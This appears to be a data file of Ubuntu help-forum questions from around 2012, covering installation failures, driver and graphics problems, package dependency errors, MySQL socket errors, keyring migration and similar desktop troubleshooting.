212190	google earth 7 , 32bit in 12.10 runs without any error but there is no image ( globe )	everything seemed to install fine . i can start google earth and all layers are available , i can even zoom in and look at 3-d buildings . but there is absolutely no image data displayed at all . if you look at the whole globe the outlines are there on an invisible globe . as you zoom in the base looks dark grey almost black but there is no image . i have tried : tools > options > graphics > safe mode tools > options > texture colors > all combinations tools > options > cache ( tried several changes to the numbers ) lspci shows display controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 ) running on a dell inspiron 6000 laptop ( 1.5gb memory )
212193	unable to install librecad ( some package could not be installed )	i had tried to install libracad from ubuntu software center but fail . then i tried using terminal command , and the below show : tay @ tay-presario-cq45-notebook-pc : ~ $ sudo apt-get install librecad [ sudo ] password for tay : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : librecad : depends : libqt4-help ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-qt3support ( > = 4:4.5.3 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . tay @ tay-presario-cq45-notebook-pc : ~ $ please help to provide solution . thank you .
212196	ubuntu wo n't start ( 12.10 with windows 8 dual boot )	i updated my pc to windows 8 and after that installed ubuntu 12.10 . i have 128 gb ssd now partitioned to 36 gb for ubuntu and rest for windows 8 . everything worked well , i installed few programs and downloaded updates for the ubuntu . ubuntu asked me to restart in order to updates to work . after that restart the trouble began . now i can only log in to ubuntu and all it shows after that , is the background image . windows works correctly , everything shows up in the grub . i presume that something went wrong with updates . is there anything i can do for it or should i just install the whole thing again ? cheers !
212201	time tracker for lxde	i have only recently started using lxde . and i am liking it . it is blazing fast , not-at-all resource hungry and just does what i want . the only thing i am missing is a time tracker tool . i have been using hamster time tracker on gnome for quite some time . in lxde , i can still launch the application . but there are no reminders when the time limit is up , etc . the time tracker is just another window . is there any way to get hamster working in lxde with notifications for time-up and an icon in the panel , etc. ? alternatively , is there another application like hamster that will do all that hamster does and works in lxde ?
212205	compiling vim from source : libsm.so : undefined reference to `uuid_unparse_lower @ uuid_1.0 '	i wanted to use all the vim customizations from steve francis ( https : //github.com/spf13/spf13-vim ) . i am using ubuntu 10.04 , 64 bit the customizations required vim 7.3 and so i am trying to compile vim from the mercurial repository . the steps i followed were sudo apt-get remove vim-common vim-runtime vim-gtk vim-gui-common sudo apt-get build-dep vim in the vim directory : ./configure -- enable-pythoninterp -- with-features=huge when i tried a make i got the following errors during the linking phase . how do i work around this . gcc -l/usr/local/lib -l/usr/local/lib -wl , -- as-needed -o vim objects/buffer.o objects/blowfish.o objects/charset.o objects/diff.o objects/digraph.o objects/edit.o objects/eval.o objects/ex_cmds.o objects/ex_cmds2.o objects/ex_docmd.o objects/ex_eval.o objects/ex_getln.o objects/fileio.o objects/fold.o objects/getchar.o objects/hardcopy.o objects/hashtab.o objects/if_cscope.o objects/if_xcmdsrv.o objects/mark.o objects/memline.o objects/menu.o objects/message.o objects/misc1.o objects/misc2.o objects/move.o objects/mbyte.o objects/normal.o objects/ops.o objects/option.o objects/os_unix.o objects/pathdef.o objects/popupmnu.o objects/quickfix.o objects/regexp.o objects/screen.o objects/search.o objects/sha256.o objects/spell.o objects/syntax.o objects/tag.o objects/term.o objects/ui.o objects/undo.o objects/version.o objects/window.o objects/gui.o objects/gui_gtk.o objects/gui_gtk_x11.o objects/pty.o objects/gui_gtk_f.o objects/gui_beval.o objects/if_python.o objects/netbeans.o objects/main.o objects/memfile.o -pthread -l/usr/local/lib -lgtk-x11-2.0 -lgdk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lgdk_pixbuf-2.0 -lm -lpangocairo-1.0 -lcairo -lpango-1.0 -lfreetype -lfontconfig -lgobject-2.0 -lgmodule-2.0 -lgthread-2.0 -lrt -lglib-2.0 -lsm -lice -lxt -lx11 -lsm -lice -lm -ltinfo -lnsl -l/usr/lib/python2.6/config -lpython2.6 -lpthread -ldl -lutil -lm -xlinker -export-dynamic -wl , -o1 -wl , -bsymbolic-functions /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../lib/libsm.so : undefined reference to `uuid_unparse_lower @ uuid_1.0' /usr/lib/gcc/x86_64-linux-gnu/4.4.3/../../../../lib/libsm.so : undefined reference to `uuid_generate @ uuid_1.0' collect2 : ld returned 1 exit status link.sh : linking failed make [ 1 ] : *** [ vim ] error 1 make [ 1 ] : leaving directory `/home/hari/vim/src' make : *** [ first ] error 2
212207	what version of package is shipped with each ubuntu version ?	how can i easily know which version of a package ( in this case perl ) is shipped with each and every version of ubuntu ? for example : i 'm running ubuntu 12.04 lts and my perl version is 5.14.2 and i want to know how to find out the version it was before i updated the system . something like this list : ubuntu 10.04 = perl 5.10 ubuntu 11.04 = perl 5.12 ubuntu 12.04 = perl 5.14.2 and so on ...
212210	can i configure both alt keys to print 3rd level signs via xmodmap or keyboard-options ?	currently only my right alt-key ( which xev prints out as keycode 108 / `` iso-level3-shift '' ) is able to print 3rd-level characters like { [ ] } . the left alt-key ( xev shows it as keycode 64 / alt_l ) does n't do anything , even though i set it via xmodmap like this : xmodmap -e `` keycode 64 = iso_level3-shift '' this did n't work but ( for some reason ) made things even worse . after using the command , the right alt-key stopped working printing these characters but produced a long sequence of what seems to be filenames , like this : { . { 7\ wonders\ -\ magical\ mystery\ tour , a { quaria , tomicworm } , broken\ rules , crayonphysicsdeluxe , f { breader , ashioncents , ontmatr ... i also tried to use the option for `` 3rd level '' in the keyboard-layout preferences , which did n't work either . any thoughts ?
212213	wubi hangs while `` almost finished copying files ''	wubi hangs while `` almost finished copying files '' on both 12.04 and 12.10 . i 'm using dell latitude e5410 with i3core processor and 8mb of ram . operating system is win7pro . thanx
212216	pythonpath not set up before rc.local executed	i 've got a python script that i want to be started on boot . putting a command in rc.local attempts to run the script , but fails because the script ca n't find the libraries on which it depends . these libraries are in a non-standard location . normally , this is n't a problem because i specify these locations by setting up the pythonpath environment variable in /etc/environment . i tried specifying pythonpath in rc.local ( a non-optimal solution anyway because i 'd like to specify it system-wide for all users in one place , ie , /etc/environment ) which partly cures the problem . but it 's still failing for one library ( quick2wire ) where the included file is in a sub-dir . pythonpath includes the path : /usr/local/lib/cr/python/quick2wire-python-api/src the actualy include file is : /usr/local/lib/cr/python/quick2wire-python-api/src/quick2wire/i2c.py normally , python has no problem knowing it needs to look in the quick2wire sub-dir . i guess i can setup a special version of pythonpath in rc.local just to get this script to run and then have the version in /etc/environment replace it . just wondered if there 's a more elegant solution .
212217	playonlinux 's unmet dependencies block from installing anything	everytime i try installing wine or playonlinux , i get this error : package dependencies can not be resolved this error could be caused by required additonal software pachages ... details : the following packages have unment dependencies : playonlinux this error sometimes appears in different variations . people on other posts say i need to do a clean install : is this right ? i do n't want to do so , but if i will have too , i will ...
212218	how to setup an intranet in ubuntu using wifi ?	i want to set up a vpn on my laptop but i do n't know what and how to set it . my requirements are : intranet with a customizable list of shared folders . intranet outsourced via computer wifi . possibly assigning individual private ip addresses to all connected . facility to share internet ( if hassel free ) . can i do this using gnome network manager or do i need another program ? i 'll be happy even if i get one folder to share for the time being and no internet if i could only outsource one file/folder .
212220	how do i create a file with touch in 12.10	i need to create a file in ubuntu to use a usb cradle to upload cycling data . i found instructions using google but am unable to create a file using touch . any help would be appreciated . this is the direction i am trying to follow : create a file /etc/udev/rules/powertap.rules containing the following line : sysfs { idvendor } == '' 0403 '' , sysfs { idproduct } == '' 6001 '' , mode= '' 666 '' , group= '' plugdev ''
212224	is there a recommendation for graphics card for ubuntu 12.10 ?	i want to build my own computer to run ubuntu 12.10 . what are your recommendations for graphics card brands that work best with 12.10 ?
212242	gedit embedded terminal is empty	i enabled the embedded terminal plug-in for gedit , but it only appears as in the picture . i ca n't type anything ! is there a way to fix this ? or am i missing something ?
212244	unable to connect mts mblaze modem in ubuntu 12.10 ?	i am using ubuntu for 1st time and i do have an modem mts mblaze in india which i am using in windows . but when i tried to connect in ubuntu 12.10 using give default method ( i.e . choose country , modem type , connection , add details and then connect ) its not working . then i came over another solution at http : //www.e-dirts.com/2012/how-to-setup-mts-mblaze-usb-modem-in-ubuntu-gnulinux/ but no installation of crossplatformui-v2.1.2-sstl-all-ubuntu.deb happens at all . is it because i 'm using 12.10 version while its tested using 12.04 version . and does that another 'advanced user method ' can be followed without internet ?
212249	cant access internet through wired connection	i downloaded and installed ubuntu using the windows installer . everything is running smoothly . when i plug in my ethernet cable is recognizes that it is plugged in and says that i am connected . whenever i try to access firefox it says firefox can not locate the server . any suggestions ? i am very new to linux as well as using cmd prompts for the terminal .
212258	startup problem in a fresh 12.10 installation	i have downloaded 12.10 image recently , and burned it to disc to install on my laptop . everything worked fine until now , when i started it first time it got stuck on loading ( ubuntu title and dots below ) . i tried restarting and it got through , but a new problem appeared . after typing my password and logging in , it just freezes there with background and mouse pointer only visible . i can start terminal with ctrl+alt+f4 but that 's all . then after few minutes , error comes up saying that application compiz has closed unexpectedly . whatever i click ( relaunch or leave closed ) it just stays frozen with background only .
212260	high cpu load for 1:30 minutes when mounting ext4-raid partition	-- > the problem solved itself < -- sometime between november 2012 and january 2013 one of the ubuntu updates made the time the mount command takes to complete go down to ~1 second again : time mount /dev/mapper/8000 /media/8000 real 0m0.942s user 0m0.000s sys 0m0.504s thanks to everyone for trying to help me out . i have a raid 5 ( software ) with 5x2tb drives . i encrypted the raid with cryptsetup and put an ext4-partition on top . in the beginning opening and mounting the raid took less than 10 seconds , now ( for a few weeks ) mounting alone takes 1:30 minutes and the cpu stays around 93 % the whole time : the output of `` time sudo mount /dev/mapper/8000 /media/8000 '' is : real 1m31.952s user 0m0.008s sys 1m25.229s at the same time only one line is added to /var/log/syslog : kernel : [ 2240.921381 ] ext4-fs ( dm-1 ) : mounted filesystem with ordered data mode . opts : ( null ) my ubuntu-version is `` 12.04.1 lts '' and no updates are pending . i checked the partition with fsck , but it says that all is ok . the `` cryptsetup luksopen '' command only takes a few seconds . i also tried changing the raid-bitmap ( as it was suggested in some forum ) but it did not change the behaviour . sudo mdadm -- grow /dev/md0 -b internal and sudo mdadm -- grow /dev/md0 -b none i had the idea that it might be the hardware being slow , but a read test with `` sudo hdparm -t /dev/md0 '' spit out values between 62 and 159 mb/sec : timing buffered disk reads : 382 mb in 3.00 seconds = 127.14 mb/sec timing buffered disk reads : 482 mb in 3.02 seconds = 159.62 mb/sec timing buffered disk reads : 190 mb in 3.03 seconds = 62.65 mb/sec timing buffered disk reads : 474 mb in 3.02 seconds = 157.12 mb/sec although i think it is strange that the read rate jumps by more than 100 % - could that mean something ? the speed test when reading from the mapped ( decrypted ) device shows similar behavior , although it is of course much slower . `` sudo hdparm -t /dev/mapper/8000 '' : timing buffered disk reads : 56 mb in 3.02 seconds = 18.54 mb/sec timing buffered disk reads : 122 mb in 3.09 seconds = 39.43 mb/sec timing buffered disk reads : 134 mb in 3.02 seconds = 44.35 mb/sec the output of a verbose mount `` mount -vvv /dev/mapper/8000 /media/8000 '' does not help much : mount : fstab path : `` /etc/fstab '' mount : mtab path : `` /etc/mtab '' mount : lock path : `` /etc/mtab~ '' mount : temp path : `` /etc/mtab.tmp '' mount : uid : 0 mount : euid : 0 mount : spec : `` /dev/mapper/8000 '' mount : node : `` /media/8000 '' mount : types : `` ( null ) '' mount : opts : `` ( null ) '' mount : you did n't specify a filesystem type for /dev/mapper/8000 i will try type ext4 mount : mount ( 2 ) syscall : source : `` /dev/mapper/8000 '' , target : `` /media/8000 '' , filesystemtype : `` ext4 '' , mountflags : -1058209792 , data : ( null ) any idea where i could find additional information on why mounting takes so long , or what additional tests i could run ?
212272	how to install a wireless driver on my dell mini 9 running ubuntu 12.10 off a usb ?	not sure how to install a driver and which driver to use - or whether i could do something in terminal . i 'm pretty sure there 's no driver there already but i might be wrong . i 'm running a dell mini 910 inspiron off of a 32gb usb with ubuntu 12.10 installed .
212273	upgrade to 12.10	i currently am on 12.04 . i followed the instructions on the ubuntu site to upgrade to 12.10 . i loaded the update manager and performed the update to bring the system up to current level . at that point the manager was supposed to notify me that there is an upgrade available and i was to click on the upgrade button , however , the manager came back and said a restart was required instead . i restarted and reloaded the update manager . it does not informed me of any upgrade being available . what do i need to do now to run the upgrade rather than downloading the iso and reinstalling ? thanx , bob
212276	how to check whether the ubuntu 12.04 is downloaded completely	just a while ago i downloaded ubuntu 12.04 live image and during installation on virtual box it gave me installer error . so is it possible to check if its downloaded without missing any part which cause this installer error .
212278	just updated to 12.10 , now it 's asking for a partial upgrade	i just updated to 12.10 the other day , and after i successfully updated to 12.10 , it 's asking me to do a partial upgrade ? i 'm wary about it , because it should n't need a partial distribution upgrade , it already successfully upgraded , and it works great , and i 'm worried if i let it run it 'll break the install and i 'll have to do a fresh install , and i really do n't want to . is it supposed to ask for a partial upgrade after successfully upgrading to 12.10 ? i should also note that i upgraded from 12.04 .
212282	using xwinwrap on startup for desktop image covers taskbar in 12.04	my problem is when i set xwinwrap to play a video for my desktop in the startup applications , when i first log in it covers the taskbar as well , the launcher is inaccessible as well . i can use super key to start a program and all is well after that , but i am wondering if there is a way to set xwinwrap to where it does not do this at all . this page that contains information about how to use xwinwrap . command line that i use in startup applications : xwinwrap -ni -o 0.6 -fs -s -st -sp -b -nf -- mplayer -wid wid -nosound /path/to/video/file.mp4 or even if you just have another method to play videos as your desktop background that works more efficiently than this one , i am not stuck on absolutely having to use this particular method , so long as the end result is the same .
212285	error for apt-get install when running ubuntu 12.04 on flash drive	i am running ubuntu 12.04 on a memory stick courtesy of livelinux - http : //www.linuxliveusb.com/ so i wanted to install git ( sudo apt-get install git ) and i 've been getting the following error message ; w : invalid regular expression '\.dpkg ... ... ( more stuff about invalid regular expression ) e : unable to locate package update i ca n't do apt-get anything sudo give me the following ; sudo : parse error in /etc/sudoers near line 0 sudo : no valid sudoers source found , quitting sudo : unable to initialize policy plugin i 'm pretty clueless here . any ideas ?
212287	unauthorized response from server with api upload	i 'm writing a library in c # to help me develop a windows application . the library uses the ubuntu one api . i am able to authenticate and can even make requests to get the quota ( access to account admin api ) and volumes ( so i know i have access to the files api at least ) here 's what i have as my upload code : public static void uploadfile ( string filename , string filepath ) { filestream file = file.openread ( filepath ) ; byte [ ] bytes = new byte [ file.length ] ; file.read ( bytes , 0 , ( int ) file.length ) ; restclient client = ubuntuoneclients.filesclient ( ) ; restrequest request = ubuntuonerequests.baserequest ( method.put ) ; request.resource = `` /content/~/ubuntu one/ '' + filename ; request.addheader ( `` content-length '' , bytes.length.tostring ( ) ) ; request.addparameter ( `` body '' , bytes , parametertype.requestbody ) ; client.executeasync ( request , webresponse = > uploadcomplete ( webresponse ) ) ; } every time i send the request i get an `` unauthorized '' response from the server . for now the `` /content/~/ubuntu one/ '' is hardcoded , but i checked and it is the location of my root volume . is there anything that i 'm missing ? ubuntuoneclients.filesclient ( ) starts the url with `` https : //files.one.ubuntu.com '' ubuntuonerequests.baserequest ( method . { } ) is the same requests that i use to send my quota and volumes requests , basically just provides all of the parameters needed to authenticate . edit : : here 's the baserequest ( ) method : public static restrequest baserequest ( method method ) { restrequest request = new restrequest ( method ) ; request.onbeforedeserialization = resp = > { resp.contenttype = `` application/json '' ; } ; request.addparameter ( `` realm '' , `` '' ) ; request.addparameter ( `` oauth_version '' , `` 1.0 '' ) ; request.addparameter ( `` oauth_nonce '' , guid.newguid ( ) .tostring ( ) ) ; request.addparameter ( `` oauth_timestamp '' , datetime.now.tostring ( ) ) ; request.addparameter ( `` oauth_consumer_key '' , ubuntuonerefreshinfo.ubuntuoneinfo.consumerkey ) ; request.addparameter ( `` oauth_token '' , ubuntuonerefreshinfo.ubuntuoneinfo.token ) ; request.addparameter ( `` oauth_signature_method '' , `` plaintext '' ) ; request.addparameter ( `` oauth_signature '' , ubuntuonerefreshinfo.ubuntuoneinfo.signature ) ; //request.addparameter ( `` method '' , method.tostring ( ) ) ; return request ; } and the filesclient ( ) method : public static restclient filesclient ( ) { return ( new restclient ( `` https : //files.one.ubuntu.com '' ) ) ; }
212288	how to replicate the volume up/down keyboard shortcuts ?	i have a notebook with no dedicated ( working ) keys for volume , so i 've set under the shortcuts settings to use win+up/down to change volume . that 's working fine and i get that nice popup showing the volume level when i press this shortcut . but i 've bought a keyboard with dedicated keys , and i want to be able to use both . thus , i would need to copy the initial shortcut ... but i have no idea of what command the original shortcut fires . i 've tried amixer command : it works , but there 's no visual cue of the volume level .
212293	creating a usb installer	i know i can install ubuntu on a usb thumb-drive , but is it possible to use a usb thumb drive as a replacement for dvd installation disk ? edit : i do n't have an empty dvd , and that 's why i need it .
212297	last update in 12.04 made skype/spotify/etc not work	i just updated ubuntu 12.04 . ( some regular update ) there were some gnome-updates and some nautilus-updates i think . after the update i ca n't start spotify , skype , krita , tv-browser and prehaps more programs . instead of a filled arrow on the left side of the launcher they show the lines of the arrow when i try to start them . spotify starts , and i see the icon in the upper statusbar . from there i can change tracks , start and stop etc . but i ca n't see the window . the other programs i ca n't do anything with . it feels like a bummer cause i choose 12.04 for the stability to use it in my business . i hope this can be resolved somewhat quickly .
212298	how to pair an iphone ?	i already installed ifuse via this code : sudo apt-get install ifuse libimobiledevice-utils and then when i want to pair via this code : idevicepair unpair & & idevicepair pair i get the following reply : will @ will-pc : ~ $ idevicepair unpair & & idevicepair pair usbmuxd_get_device_list : error opening socket ! no device found , is it plugged in ? and yes i did have my phone unlocked the whole process . help would be appreciated !
212299	how migrate my keyring ( containing ssh passprases , nautilus remote filesystem , pgp passwords ) and network manager connections ?	i changed the disk on my laptop and installed ubuntu on the new disk . old disk had 12.04 upgraded to 12.10 on it . now i want to copy my old keyring with wifi passwords , ftp passwords for nautilus and ssh key passphrases . i have the whole data from the old disk available ( is now a usb disk and i did not delete the old data yet or do anything with it - i could still put it in the laptop and boot from it like nothing happened ) . on the new disc that is now in my laptop , i have installed 12.10 with the same password , user-id and username as on the old disk . then i copied a few important config files from the old disk ( e.g . ~/.firefox/ , ~/.mozilla , ~/.skype and so on , which all worked fine ... except for the key ring : the old methods of just copying ~/.gconf/ ... and ~/.gnome2/keyrings wo n't work . did i miss something ? 1 . edit : i figure one needs to copy files not located in the users home directory as well . i copied the whole old /home/confus ( which is my home directory ) to the fresh install to no effect . that whole copy is now reverted to the fresh install 's home directory , so my /home/confus is as it was the after fresh install . 2 . edit : the folder /etc/networkmanager/system-connections seems to be the place for wifi passwords . could be that /usr/share/keyrings is important as well for ssh keys - that 's the only sensible thing that a search came up with : find /usr/ -name `` *keyring* 3 . edit : still no ssh and ftp passwords from the keyring . what i did : convert old hard drive to usb drive put new drive in the laptop and installed fresh version of 12.10 there ( same uid , username and passwort ) booted from old hdd via usb and copied its /etc/netwrokmanager/system-connections , ~/.gconf/ and ~/.gnome2/keyrings , ~/.ssh over to the new disk . confirmed that all keys on the old install work booted from new disk result : no passphrase for ssh keys , no ftp passwords in keyring . at least the wifi passwords are migrated . 4 . edit : boutny ! ending soon ... 5 . edit : keyring 's now in ./local/share/keyrings/ . also interesting .gnupg
212307	can not find wireless after installation , please help	i recently posted a question but could n't get any help from it so here goes again : i am new to linux . i downloaded ubuntu 12.10 onto a usb drive to put on an old laptop just for fun . i realized that ubuntu is awesome and wanted to install it . the install worked fine but here is the problem : when i boot it from the hard drive i ca n't get wireless . there are no wireless routers listed , nor is `` enable wireless '' . when i boot it from the usb drive ( i.e . `` try ubuntu '' at the first pop-up ) it automatically connects to wireless . a dozen nearby routers show up and `` enable wireless '' is visible . i can not just boot from usb every time because it is only 4gb compared to a 500gb hard drive . i really want to use ubuntu ; it seems great , but i also need wireless service . am i using a wrong form of ubuntu ? what is the problem here , and how do i fix it ? thank you so much for helping me .
212313	compiz problems in ubuntu 12.10	i have installed ubuntu 12.10 x64 on my notebook and i wanted to make a little customization in the ui , so i downloaded compiz settings manager and opened it up . once i opened it up , i found out that in the compiz are not all those settings and animations ( that i could apply like on the photos , videos etc . ) so i reinstalled it few times . once i get bored with the reinstalling i checked one field in there and ubuntu ( os ) started to get `` lagged '' ( dash get hid , os started to do not respond very well ) . so please , can anyone help me ? how can i customize my ubuntu without get lagged and with all the animations that have to be available in the compiz ? thanks to all ! thank you ! it seems that it helped to fix the dash-hide problem , but i still do not have all the animations and features that have to be in the compiz ( program ) . can you help me with this too please ? thanks a lot !
212316	windows 7 when starting ubuntu black & blue striped screen after upgrade	i got a message saying that my version of ubuntu was obsolete so i clicked to update . i have windows 7 and run ubuntu in a virtual box vm . when ubuntu tries to startup i get a screen with black & blue stripes and large black words that i ca n't read .
212319	can not log into admin account	i saved a command that would hide the accounts other than the admin into the lightdm file and it chose to keep an `` other '' account for which i do n't have the password . i can not open the terminal from the login so i do n't know what to do .
212322	running x/unity inside lxc container	i have already created a number of lxc containers in my 12.04 machine . i need to run gui applications inside them ( mostly firefox ) . is it correct to presume that it will work out of the box ? if not , what do i need to do to make it work ?
212324	asus epc 1015cx wo n't boot with display after installing additional drivers	i have a asus epc 1015cx with ubuntu 12.04 lts installed using wubi alongside windows 7 . it worked perfectly after installing except that the supported screen resolution was only 800*600 instead of 1024*600 . the specifications of the 1015cx device can be found here i tried installing additional drivers which was broadcom for wireless and cedarview-drm . by this time there was no display coming up after the boot . i could hear a voice and then the letters i typed got pronounced correctly . so , i guessed the issue has to be with the graphic terminal . i tried repair broken packages in the menu and booted and the display is now at 1024*600 . but , if i restart normally the problem continues like before . as per what i found out after searching , i again opened additional drivers and installed cedarview-graphics-driver . i tried restarting hoping it will work . but again , the result was same . there was no display but the system was working . i did more searching and followed the instructions found here . but still the result was same . i am keen to switch to linux from windows after hearing and learning great things about it . i know this community is good and always helping . i wanted to thank you all for the help in advance . please let me know what i am doing wrong and help me to switch to linux from this same old windows .
212326	configure buttons on logitech m705	i would like change the extra button functionality . i want change the back/forward button to sound up/sound down . it is possible in ubuntu ? i had been searching , but i have n't found any relevant results .
212331	code : :blocks : g++ not found	recently i have installed code : :blocks ide on my ubuntu 12.10 . the following error appears when i try to run or compile any code written in there : compiling : /home/sabbir/first.cpp /bin/sh : 1 : g++ : not found process terminated with status 127 ( 0 minutes , 0 seconds ) 0 errors , 0 warnings how can i solve this problem ?
212335	crontab instances	i have been doing some research on scheduling tasks and what not . i came across the crontab command function . is crontab a file that is created or is it a command ? if it is a file , then how many can one user have ? are they user-specific or system-specific ( for instance , if i create a task using crontab , will the task execute if another user logs in to the system ? ) if it is a command , where does it store the info for executing tasks ?
212336	default keys `` 1 2 3 4 5 6 7 8 9 0 '' to input `` ! @ # $ % ^ & * ( ) ''	doing math homework on a full keyboard . would like the top row to be the special characters without holding shift .
212337	12.10 not working upon boot	i recently upgraded to ubuntu 12.10 on a relatively old computer . it has a partitioned hard drive ( shared with xp ) . upon boot , i got a mouse , and a black screen . also note that when i was upgrading , it said that a unity plug in does not play nicely with my graphics card . please help !
212344	mysql # 2002 problem	when i try to login in apache i get a # 2002 error . when i try to login in mysql via terminal it ask my password and i get : $ mysql -u root error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) i tried to remove mysql and install it again and nothing happen ( i cant even remove it ) i try to reboot apache but still nothing . i tried to reboot my pc and of course still aint working . in terminal i get this : $ sudo start mysql start : job failed to start $ mysql -ubob -hlocalhost -p3306 -p error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) $ sudo service mysql stop stop : unknown instance : here is my my.cnf file : # * basic settings # user = mysql pid-file = /var/run/mysqld/mysqld.pid socket = /var/run/mysqld/mysqld.sock port = 3306 basedir = /usr datadir = /var/lib/mysql tmpdir = /tmp lc-messages-dir = /usr/share/mysql skip-external-locking i tried to find if there is a file in my /var/run/mysqld/ or in /var/tmp/ and dint find the file mysqld.sock ... i looked in /var/log/mysql/ and do n't even have anything in it . can you help me ? i try to find help on google for hours and di n't help at all ... more info : result of cat /var/log/syslog | grep mysql here /var/run/mysqld/ exists but it does n't have anything in it $ ls -la/var/run/mysqld/ total 0 drwxr-xr-x 2 mysql root 40 nov 5 22:31 . drwxr-xr-x 25 root root 860 nov 5 22:32 .. my ubuntu is 12.04 lts . can you tell me how can i make backups of my databases too ? if you dont have something better then reinstall at least i can backup my databases i tried to make backup with following : mysqldump -u root -p âall-databases > all_backup.sql enter password : mysqldump : got error : 2002 : ca n't connect to local mysql server through socket > '/var/run/mysqld/mysqld.sock ' ( 2 ) when trying to connect
212346	can a raspberry pi run ubuntu ?	i was thinking about buying a raspberry pi , and running ubuntu on it . i have looked around the web , and a lot of stuff says that it 's difficult for it to work on arm processors . has anyone figured out how to get a raspberry pi to run ubuntu ?
212348	can i delete my home folder to start fresh ?	and if i can how ? i 'm using gnome shell if that matters
212349	unrecoverable error during wubi installation	i tried to install 12.10 on my pc with windows 7 installed , but i do n't have a cd drive and my pc does n't support usb booting , so i tried the windows installer ( wubi ) . i had the iso image mounted with daemon tools , so the windows installer took those files and used them ( i guess , because it did n't download any files ) . everything went right , but when it prompted me to reboot , i rebooted the pc and then it starts to install , but when the installation process starts , a message that says : the installation found a unrecoverable error . pops out and makes me reboot , then when i select ubuntu in the operating system selection screen , it says that an error occurred .
213352	what directories does user own - lts 12.04	which directories in the hierarchy does the default main user ( uid 1000 ) own ? like maybe /usr/share/ or /bin/ i need to now exactly the directories my user needs to own in the hierarchy , in short i made a mistake , details here : 12.04 lts wo n't boot after modifying root directory permissions and specifically which files handle the sudo command , as when i try to use it from tty it reports an error , sudo : need to be root to perform operation
213355	is there way to boot from windows by default ?	when the computer loads up , it shows a list of what to boot from . is there a way to hide this and automatically boot from windows unless a key is pressed ?
213359	save kernel on acer aspire one270 with ubuntu 12.10 - booting issues	i did search the forums for quite some time , yet did not find any answer to my problem ... i have an acer aspire one d270 with windows 7 starter and i 've installed ubuntu using the wubi installer . when i boot to windows 7 , everything works fine , however , when i try to run ubuntu , it gets stuck on a black screen at stopping kernel messages ( or other lines ) , followed by some lines with [ 20 ... .. ] and wo n't continue ... could anyone point me to a solution to this problem ?
213360	how to fix âmodule ndiswrapper not found ''	i have ubuntu 12.10 and whenever i run sudo modprobe ndiswrapper , i get the following error . fatal : module ndiswrapper not found . the command dkms status returns with ... ndiswrapper , 1.57 , 3.2.0-32-generic , i686 : installed when i run ndiswrapper -v i am returned with this ... jason @ jason : ~ $ ndiswrapper -v utils version : '1.9 ' , utils version needed by module : '1.9' module details : filename : /lib/modules/3.5.0-18-generic/updates/dkms/ndiswrapper.ko version : 1.58rc1 vermagic : 3.5.0-18-generic smp mod_unload modversions 686 i have installed commons , utils-1.9 , dkms , source but it 's still returning this error . how do i fix this ?
213363	mpd to play music to single channel of my multi-channel card ?	i installed an ubuntu 12-04 lts server for a special background music application of mine , where i am using the server with an asus xonar ds sound card . the installation is successful , the mpd is working , the sound card is working with alsa and its libraries installed except for alsa-oss . alsamixer is working fine with left/right sides of each channel volume control through q/z letters shortcut when alsamixer is open in terminal . using the command speaker-test -dplug : surround71 -c8 -l1 -twav , i can hear every voice message coming out from the card at the right connector , so `` front right/ front left '' voice message are coming from first output in the card back , while the other outputs are silent..so on . the problem is that mpd is playing on all outputs simultaneously the same audio . i have been trying various configurations for the last 12 days with out any success , including trying to put mappings in the /etc/asound.conf can any body help me achieve the above , or direct me to the right configuration of mpd or asound.conf ?
213365	best solution for a team home server	i created a home server with ubuntu 12.04 server ( using an old netbook with an atom cpu and 512mb ) . the idea is just to be used for a small team ( maximum 10 persons ) that will have constant access by ssh to the main projects and could add features with git , and will , as well , have their own directory ( with virtualhost configured ) for their own personal projects . everything is configured and running , but my question is : what is the best solution here for everyone to work ? it is to have them on the http group and then all have access as normal users to the /var/www folder ( that also contains gitweb and drupal ) , or would be to create a new user named after the project ( as an example ) where only those with the password could have access to work ( configured with virtualhost ) . notice : the idea is to have 1 person responsible of the server directly ( since he is the one who is hosting it ) , 2 more people that will have access to the root from their home in order to configure anything from their home , plus anyone else that joins the group without any root access , but just the necessary access to create personal works and work with git .
213377	where are desktop menus filed ?	i am wishing to look at the .desktop files associated with my main menu panel . i am using gnome on ubuntu 11.04 .
213380	run shell script downloaded from web	i have a .sh script ( wget-20121105144134.sh ) which i downloaded from the web . the script contains codes to download huge climate data files . can you tell me how to run this file on linux ? it is easy for me to run a file which exist in my directory . the file above has been downloaded from the web and how can i add to my current directory or run directly on terminal ? regards , elv .
213382	xubuntu application menu not refreshing	when a new program gets installed , the item is in the edit menu area , but does not show up in the applications menu . this is fixed if i close my session of xfce and log back in , but it seems unpredictable as to why it happens or when it happens . i have tried a couple of ways of manually refreshing , neither seems to work . additional information : if i right click on desktop , under applications the menu entries are there , so its just on the top bar menu .
213396	netflix drm error ( ubuntu 12.10 , virtualbox , win7 )	has anyone seen the netflix drm error described below ? if so , is there a way around it ? to attempt to solve the problem of viewing netflix on ubuntu , i have created a virtual machine running windows 7 . this approach has been suggested in the answers to is there a way to stream netflix ? and can be seen working in this video . i am running ubuntu 12.10 , virtualbox 14.1.18 , windows 7 , and firefox 16.0.2 . i am able to login to netflix , select a show to watch , and see the show start to load , but then i get the following error . solution the solution is on the link provided by bford16 . remove/rename the mspr.hds file . windows 7 location : c : \programdata\microsoft\playready\mspr.hds windows xp location : c : \documents and settings\all users\application data\microsoft\playready\mspr.hds
213397	how do i make vlc completely disable xscreensaver ?	there are some internet hits for this query , but none has a satisfying answer . how can i make vlc and xscreensaver play nice together on ubuntu 12.10 ( using xmonad , not unity or gnome or anything ) ? i want any fullscreen application ( in xmonad ) and vlc to completely disable xscreensaver from taking any automatic actions . essentially if vlc changed xscreensaver.timeout to infinity while playing , that would be perfect . i do not want to have to run a shell script to disable the screensaver .
